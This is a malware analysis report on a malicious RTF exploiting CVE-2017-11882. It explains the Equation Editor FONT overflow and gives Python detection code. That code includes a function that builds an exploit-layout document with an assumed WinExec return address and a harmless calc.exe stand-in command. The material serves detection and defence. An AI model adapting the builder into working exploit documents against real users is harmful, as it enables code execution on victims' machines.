Malicious RTF — malware analysis report

Static analysis result for SHA-256 de651239f0fd4c67…

Verdict: MALICIOUS
File type: RTF
Size: 11.8 KB    First seen: 2019-09-30
MD5:     ccaef12605d6833f63ae41a0893f4798
SHA-1:   cbdef6486423fc463d40c50c6463ea599b3a6de5
SHA-256: de651239f0fd4c670e91adda965c76b9fe1234937418b52383619bf5905c20eb
Risk score: 180

Malware Insights

MITRE ATT&CK
T1203      Exploitation for Client Execution
T1566.001  Spearphishing Attachment

The RTF file triggers critical heuristics indicating exploitation of CVE-2017-11882 in the Equation Editor (EQNEDT32.EXE). The bug is a stack buffer overflow in the handling of the MTEF FONT record: an overlong typeface name overwrites the saved return address, giving arbitrary code execution in the Equation Editor process, which exploit documents commonly use to launch a command that retrieves or drops a second-stage payload. The embedded OLE object data (\objdata) and the \objupdate control word, which forces the object to be activated as soon as the document is opened, corroborate that the embedded object is the exploitation vector rather than benign content.

Heuristics (4)

  • Equation Editor CLSID [critical; CVE likely] RTF_EQUATION_EDITOR
    Equation Editor OLE CLSID found inside an OLE object. The component is the target of CVE-2017-11882, CVE-2018-0802 and CVE-2018-0798; on its own the CLSID shows only that an Equation Editor object is embedded.
  • CVE-2017-11882 (Equation Editor FONT record overflow) [critical; CVE likely] CVE_2017_11882
    The Equation Editor MTEF data contains an overlong FONT typeface field, the field that the vulnerable copy routine in EQNEDT32.EXE overflows. This is stronger evidence than the CLSID alone because it identifies the malformed record that drives code execution.
  • \objupdate forces OLE activation [high] RTF_OBJUPDATE
    The RTF contains \objupdate, which makes the host application update, and therefore instantiate, the embedded object as soon as the document is opened, so the Equation Editor process is launched without the user clicking the object. Almost exclusively seen in Equation Editor exploit documents.
  • OLE object data [medium] RTF_OBJDATA
    The RTF contains 1 \objdata section (embedded OLE object).
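As an added example (not the analyzer's or the report's own code), the following Python reproduces the detection logic behind the summary and the four heuristics above: it carves \objdata hex out of an RTF, unwraps the OLE 1.0 object header, and scans the native data for the Equation Editor CLSID, an MTEF header, and a FONT record whose typeface name exceeds the 0x24-byte stack buffer in EQNEDT32.EXE. The rule names mirror this report; the RET_OFFSET and WINEXEC_RET constants reflect the layout of the widely circulated public exploit and are assumptions for illustration; the sample document is constructed inline with a harmless stand-in command and is not the bytes of the sample analysed here. The \objdata carving deliberately ignores the control-word obfuscation real samples use inside the hex run.

```python
"""Detection logic for RTF / Equation Editor (CVE-2017-11882) indicators. Added example."""
import re
import struct

# Equation Editor 3.0 class id {0002CE02-0000-0000-C000-000000000046}, on-disk (little-endian GUID) byte order
EQNEDT_CLSID = bytes.fromhex("02CE020000000000C000000000000046")
# MTEF header: version 3, platform 1 (Windows), product 1 (Equation Editor), product version 3, any subversion
MTEF_HDR = re.compile(rb"\x03\x01\x01\x03.", re.DOTALL)
FONT_TAG = 0x08           # MTEF FONT record: tag, tface, style, NUL-terminated typeface name
FONT_BUFFER = 0x24        # stack buffer the vulnerable EQNEDT32.EXE routine copies the name into
RET_OFFSET = 0x2C         # assumption: name bytes needed to reach the saved return address (public exploit layout)
WINEXEC_RET = 0x00430C12  # assumption: return address into EQNEDT32.EXE (call WinExec) used by the public exploit
OBJDATA_RE = re.compile(r"\\objdata\b([0-9A-Fa-f\s]+)")


def carve_objdata(rtf: str) -> list:
    """Decode every \\objdata hex run. Simplified: does not undo interleaved control words."""
    blobs = []
    for m in OBJDATA_RE.finditer(rtf):
        hexstr = re.sub(r"\s+", "", m.group(1))
        blobs.append(bytes.fromhex(hexstr[: len(hexstr) & ~1]))  # drop a dangling nibble
    return blobs


def parse_ole1(blob: bytes):
    """Unwrap the OLE 1.0 ObjectHeader (OLEVersion, FormatID, ClassName, TopicName,
    ItemName, NativeDataSize). Returns (class_name, native_data) or None."""
    try:
        version, _fmt, cls_len = struct.unpack_from("<III", blob, 0)
        if version != 0x00000501:
            return None
        off = 12
        cls = blob[off:off + cls_len].rstrip(b"\x00").decode("latin-1")
        off += cls_len
        (topic_len,) = struct.unpack_from("<I", blob, off); off += 4 + topic_len
        (item_len,) = struct.unpack_from("<I", blob, off); off += 4 + item_len
        (native_len,) = struct.unpack_from("<I", blob, off); off += 4
    except struct.error:
        return None
    return cls, blob[off:off + native_len]


def find_overlong_font(mtef: bytes):
    """Return (offset, name) of the longest FONT record whose name exceeds FONT_BUFFER, else None."""
    hit = None
    for i in range(len(mtef) - 3):
        if mtef[i] != FONT_TAG:
            continue
        end = mtef.find(b"\x00", i + 3)
        name = mtef[i + 3:end if end != -1 else len(mtef)]
        if len(name) > FONT_BUFFER and (hit is None or len(name) > len(hit[1])):
            hit = (i, name)
    return hit


def analyze_rtf(rtf: str) -> dict:
    f = {"objupdate": bool(re.search(r"\\objupdate\b", rtf)), "objdata_count": 0,
         "class_names": [], "eqnedt_clsid": False, "mtef_header": False,
         "overlong_font": None, "winexec_ret": False}
    for blob in carve_objdata(rtf):
        f["objdata_count"] += 1
        parsed = parse_ole1(blob)
        data = blob if parsed is None else parsed[1]   # scan the raw blob if the OLE1 header is missing
        if parsed is not None:
            f["class_names"].append(parsed[0])
        f["eqnedt_clsid"] |= EQNEDT_CLSID in data
        m = MTEF_HDR.search(data)
        if m:
            f["mtef_header"] = True
            font = find_overlong_font(data[m.end():])
            if font:
                f["overlong_font"] = len(font[1])
                f["winexec_ret"] = struct.pack("<I", WINEXEC_RET) in data
    return f


def fired_rules(f: dict) -> list:
    """Map findings onto the rule names used in this report."""
    rules = []
    if f["objdata_count"]:
        rules.append("RTF_OBJDATA")
    if f["objupdate"]:
        rules.append("RTF_OBJUPDATE")
    if f["eqnedt_clsid"]:
        rules.append("RTF_EQUATION_EDITOR")
    if f["overlong_font"]:
        rules.append("CVE_2017_11882")
    return rules


def build_sample() -> str:
    """Constructed test document in the public exploit layout; NOT the analysed sample, harmless stand-in command."""
    name = b"cmd.exe /c calc.exe".ljust(RET_OFFSET, b" ") + struct.pack("<I", WINEXEC_RET)  # 44 bytes + return address
    mtef = b"\x03\x01\x01\x03\x0A" + b"\x0A\x01" + bytes([FONT_TAG, 0x5A, 0x5A]) + name
    native = EQNEDT_CLSID + b"\x00" * 16 + mtef           # stand-in for the compound-file body
    cls = b"Equation.3\x00"
    ole1 = (struct.pack("<III", 0x501, 2, len(cls)) + cls + struct.pack("<II", 0, 0)
            + struct.pack("<I", len(native)) + native)
    return "{\\rtf1{\\object\\objemb\\objupdate{\\*\\objdata " + ole1.hex() + "}}}"


if __name__ == "__main__":
    result = analyze_rtf(build_sample())
    print(result, fired_rules(result))
```

Against the constructed document all four rules fire and the FONT name measures 47 bytes (44 bytes of command padding plus the three non-zero bytes of the return address), well past the 36-byte buffer; a normal typeface name such as "Times New Roman" is left alone.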

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename                     Kind                  Source                         Size
objdata_00_off00000937.bin   rtf-objdata-decoded   RTF \objdata at offset 0x937   4653 bytes
  SHA-256: b647a4fbf24f2828d65fcd5b93e88bb2d237aa21f05f01fafa4ca22b27095a5c